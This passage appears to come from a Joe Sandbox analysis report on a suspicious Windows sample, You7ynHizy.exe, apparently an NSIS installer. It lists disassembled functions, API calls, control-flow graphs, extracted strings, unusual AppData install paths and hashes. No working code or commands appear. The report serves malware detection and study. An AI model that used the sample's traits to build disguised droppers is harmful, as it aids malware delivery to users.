                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsu4899.tmp$pOz
                                                                                            • API String ID: 2295610775-3134192649
                                                                                            • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                            • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                                            • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                            • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                                            Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID:
                                                                                            • API String ID: 1974802433-0
                                                                                            • Opcode ID: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
                                                                                            • Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
                                                                                            • Opcode Fuzzy Hash: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
                                                                                            • Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A
                                                                                            Function 00403D35 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 190 403d35-403d47 191 403e88-403e97 190->191 192 403d4d-403d53 190->192 194 403ee6-403efb 191->194 195 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 191->195 192->191 193 403d59-403d62 192->193 196 403d64-403d71 SetWindowPos 193->196 197 403d77-403d7a 193->197 199 403f3b-403f40 call 40425a 194->199 200 403efd-403f00 194->200 195->194 196->197 204 403d94-403d9a 197->204 205 403d7c-403d8e ShowWindow 197->205 209 403f45-403f60 199->209 201 403f02-403f0d call 401389 200->201 202 403f33-403f35 200->202 201->202 223 403f0f-403f2e SendMessageW 201->223 202->199 208 4041db 202->208 210 403db6-403db9 204->210 211 403d9c-403db1 DestroyWindow 204->211 205->204 216 4041dd-4041e4 208->216 214 403f62-403f64 call 40140b 209->214 215 403f69-403f6f 209->215 219 403dbb-403dc7 SetWindowLongW 210->219 220 403dcc-403dd2 210->220 217 4041b8-4041be 211->217 214->215 226 403f75-403f80 215->226 227 404199-4041b2 DestroyWindow EndDialog 215->227 217->208 225 4041c0-4041c6 217->225 219->216 221 403e75-403e83 call 404275 220->221 222 403dd8-403de9 GetDlgItem 220->222 221->216 228 403e08-403e0b 222->228 229 403deb-403e02 SendMessageW IsWindowEnabled 222->229 223->216 225->208 231 4041c8-4041d1 ShowWindow 225->231 226->227 232 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 226->232 227->217 233 403e10-403e13 228->233 234 403e0d-403e0e 228->234 229->208 229->228 231->208 260 403fd5-403fda 232->260 261 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 232->261 238 403e21-403e26 233->238 239 403e15-403e1b 233->239 237 403e3e-403e43 call 4041e7 234->237 237->221 241 403e5c-403e6f SendMessageW 238->241 243 403e28-403e2e 238->243 239->241 242 403e1d-403e1f 239->242 241->221 242->237 247 403e30-403e36 call 40140b 243->247 248 403e45-403e4e call 40140b 243->248 258 403e3c 247->258 248->221 257 403e50-403e5a 248->257 257->258 258->237 260->261 264 40401b-40401c 261->264 265 40401e 261->265 266 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050-404061 SendMessageW 266->267 268 404063 266->268 269 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 267->269 268->269 269->209 280 4040ae-4040b0 269->280 280->209 281 4040b6-4040ba 280->281 282 4040d9-4040ed DestroyWindow 281->282 283 4040bc-4040c2 281->283 282->217 285 4040f3-404120 CreateDialogParamW 282->285 283->208 284 4040c8-4040ce 283->284 284->209 287 4040d4 284->287 285->217 286 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->286 286->208 292 40417f-404192 ShowWindow call 40425a 286->292 287->208 294 404197 292->294 294->217
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                                            • ShowWindow.USER32(?), ref: 00403D8E
                                                                                            • DestroyWindow.USER32 ref: 00403DA2
                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                                            • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403EA8
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
                                                                                            • EnableWindow.USER32(?,?), ref: 00404011
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                                            • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                                            • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 3282139019-0
                                                                                            • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                            • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                                            • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                            • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E
                                                                                            Function 00403987 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 295 403987-40399f call 406671 298 4039a1-4039b1 call 4061de 295->298 299 4039b3-4039ea call 406165 295->299 308 403a0d-403a36 call 403c5d call 405c74 298->308 304 403a02-403a08 lstrcatW 299->304 305 4039ec-4039fd call 406165 299->305 304->308 305->304 313 403ac8-403ad0 call 405c74 308->313 314 403a3c-403a41 308->314 320 403ad2-403ad9 call 4062b9 313->320 321 403ade-403b03 LoadImageW 313->321 314->313 315 403a47-403a61 call 406165 314->315 319 403a66-403a6f 315->319 319->313 322 403a71-403a75 319->322 320->321 324 403b84-403b8c call 40140b 321->324 325 403b05-403b35 RegisterClassW 321->325 326 403a87-403a93 lstrlenW 322->326 327 403a77-403a84 call 405b99 322->327 339 403b96-403ba1 call 403c5d 324->339 340 403b8e-403b91 324->340 328 403c53 325->328 329 403b3b-403b7f SystemParametersInfoW CreateWindowExW 325->329 333 403a95-403aa3 lstrcmpiW 326->333 334 403abb-403ac3 call 405b6c call 406297 326->334 327->326 332 403c55-403c5c 328->332 329->324 333->334 338 403aa5-403aaf GetFileAttributesW 333->338 334->313 343 403ab1-403ab3 338->343 344 403ab5-403ab6 call 405bb8 338->344 348 403ba7-403bc1 ShowWindow call 406601 339->348 349 403c2a-403c2b call 4053d2 339->349 340->332 343->334 343->344 344->334 356 403bc3-403bc8 call 406601 348->356 357 403bcd-403bdf GetClassInfoW 348->357 352 403c30-403c32 349->352 354 403c34-403c3a 352->354 355 403c4c-403c4e call 40140b 352->355 354->340 358 403c40-403c47 call 40140b 354->358 355->328 356->357 361 403be1-403bf1 GetClassInfoW RegisterClassW 357->361 362 403bf7-403c1a DialogBoxParamW call 40140b 357->362 358->340 361->362 366 403c1f-403c28 call 4038d7 362->366 366->332
                                                                                            APIs
                                                                                              • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                              • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                            • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\You7ynHizy.exe",00000000), ref: 00403A08
                                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
                                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403AA6
                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen), ref: 00403AEF
                                                                                              • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                                            • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                                            • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                                            • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                            • API String ID: 1975747703-4014211514
                                                                                            • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                            • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                                            • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                            • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D
                                                                                            Function 00402EDD Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d8d 372 402f37-402f65 call 406297 call 405bb8 call 406297 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 40330e 384->387 386->387 396 402f9a-402fa1 387->396 397 4030bc-4030c4 call 402e79 387->397 391 403067-40307f call 403324 call 40330e 388->391 392 403089-4030b3 GlobalAlloc call 403324 call 403116 388->392 389->374 391->389 420 403081-403087 391->420 392->389 418 4030c6-4030d7 392->418 398 402fa3-402fb7 call 405d48 396->398 399 40301d-403021 396->399 397->389 407 40302b-403031 398->407 416 402fb9-402fc0 398->416 406 403023-40302a call 402e79 399->406 399->407 406->407 409 403040-40304a 407->409 410 403033-40303d call 406764 407->410 409->384 417 403050 409->417 410->409 416->407 422 402fc2-402fc9 416->422 417->381 423 4030d9 418->423 424 4030df-4030e4 418->424 420->389 420->392 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d48 426->428 427->407 429 402fdd-402ffd 427->429 432 40310d 428->432 429->389 431 403003-403007 429->431 433 403009-40300d 431->433 434 40300f-403017 431->434 432->374 433->417 433->434 434->407 435 403019-40301b 434->435 435->407
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\You7ynHizy.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                              • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                              • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\You7ynHizy.exe,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\You7ynHizy.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                                            • API String ID: 4283519449-1531417150
                                                                                            • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                            • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
                                                                                            • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                            • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D
                                                                                            Function 004062B9 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 436 4062b9-4062c4 437 4062c6-4062d5 436->437 438 4062d7-4062ed 436->438 437->438 439 4062f3-406300 438->439 440 406505-40650b 438->440 439->440 443 406306-40630d 439->443 441 406511-40651c 440->441 442 406312-40631f 440->442 445 406527-406528 441->445 446 40651e-406522 call 406297 441->446 442->441 444 406325-406331 442->444 443->440 447 4064f2 444->447 448 406337-406375 444->448 446->445 452 406500-406503 447->452 453 4064f4-4064fe 447->453 450 406495-406499 448->450 451 40637b-406386 448->451 456 40649b-4064a1 450->456 457 4064cc-4064d0 450->457 454 406388-40638d 451->454 455 40639f 451->455 452->440 453->440 454->455 458 40638f-406392 454->458 461 4063a6-4063ad 455->461 459 4064b1-4064bd call 406297 456->459 460 4064a3-4064af call 4061de 456->460 462 4064d2-4064da call 4062b9 457->462 463 4064df-4064f0 lstrlenW 457->463 458->455 465 406394-406397 458->465 474 4064c2-4064c8 459->474 460->474 467 4063b2-4063b4 461->467 468 4063af-4063b1 461->468 462->463 463->440 465->455 470 406399-40639d 465->470 472 4063b6-4063d4 call 406165 467->472 473 4063ef-4063f2 467->473 468->467 470->461 482 4063d9-4063dd 472->482 475 406402-406405 473->475 476 4063f4-406400 GetSystemDirectoryW 473->476 474->463 478 4064ca 474->478 480 406470-406472 475->480 481 406407-406415 GetWindowsDirectoryW 475->481 479 406474-406478 476->479 483 40648d-406493 call 40652b 478->483 479->483 488 40647a 479->488 480->479 485 406417-406421 480->485 481->480 486 4063e3-4063ea call 4062b9 482->486 487 40647d-406480 482->487 483->463 491 406423-406426 485->491 492 40643b-406451 SHGetSpecialFolderLocation 485->492 486->479 487->483 489 406482-406488 lstrcatW 487->489 488->487 489->483 491->492 495 406428-40642f 491->495 496 406453-40646a SHGetPathFromIDListW CoTaskMemFree 492->496 497 40646c 492->497 498 406437-406439 495->498 496->479 496->497 497->480 498->479 498->492
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063FA
                                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,halituses,?,00405336,halituses,00000000), ref: 0040640D
                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405336,?,00000000,halituses,?,00405336,halituses,00000000), ref: 00406449
                                                                                            • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406457
                                                                                            • CoTaskMemFree.OLE32(?), ref: 00406462
                                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                                            • lstrlenW.KERNEL32(: Completed,00000000,halituses,?,00405336,halituses,00000000), ref: 004064E0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                            • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$halituses
                                                                                            • API String ID: 717251189-3468386958
                                                                                            • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                            • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                                            • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                            • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D
                                                                                            Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
